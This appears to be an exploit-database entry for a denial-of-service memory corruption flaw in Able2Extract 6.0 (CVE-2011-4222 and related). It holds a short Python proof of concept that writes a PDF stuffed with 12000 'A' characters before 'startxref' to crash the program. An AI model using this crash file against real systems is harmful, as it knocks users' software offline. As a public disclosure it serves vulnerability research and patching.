EXPLOITS

Able2Extract and Able2Extract Server 6.0 - Memory Corruption

Author: Carlos Mario Penagos Hollmann
type: dos
platform: windows
port: 
date_added: 2012-06-25  
date_updated: 2012-06-25  
verified: 1  
codes: CVE-2011-4222;CVE-2011-4221;CVE-2011-4220;OSVDB-76849  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 19392.py  

# Exploit Title: Able2Extract and Able2Extract Server v 6.0 Memory
Corruption
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.investintech.com
# Version:6.0
# Tested on: Windows 7
# CVE : cve-2011-4222


payload ="A"*12000
crash="startxref"
pdf=payload+crash

filename = "slimpdPoC.pdf"
file = open(filename,"w")
file.writelines(pdf)
file.close()